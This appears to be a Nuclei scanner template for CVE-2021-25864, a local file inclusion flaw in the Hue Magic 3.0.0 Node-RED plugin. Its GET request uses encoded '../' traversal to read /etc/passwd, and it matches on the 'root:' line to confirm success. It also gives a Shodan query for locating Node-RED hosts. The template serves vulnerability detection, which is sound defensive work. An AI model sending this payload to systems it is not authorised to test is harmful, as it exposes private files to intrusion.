45 lines
1.5 KiB
YAML
45 lines
1.5 KiB
YAML
id: CVE-2021-25864
|
|
|
|
info:
|
|
name: Hue Magic 3.0.0 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.
|
|
impact: |
|
|
The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
|
|
remediation: |
|
|
Apply the latest security patch or update to a non-vulnerable version of Hue Magic.
|
|
reference:
|
|
- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-25864
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-25864
|
|
cwe-id: CWE-22
|
|
epss-score: 0.33276
|
|
epss-percentile: 0.96644
|
|
cpe: cpe:2.3:a:dgtl:huemagic:3.0.0:*:*:*:*:node.js:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: dgtl
|
|
product: huemagic
|
|
framework: node.js
|
|
shodan-query: title:"NODE-RED"
|
|
tags: cve2021,cve,huemagic,lfi,dgtl,node.js
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100954d5e5dd4e01d1c4c32164cf1c501be641b31cfe1e94a860d72d70245c1fd8f022015a7ecc2473deaeddb0d70e7aa2c3685c4d21b32a1d38746adeebccf05aa4fbf:922c64590222798bb761d5b6d8e72950 |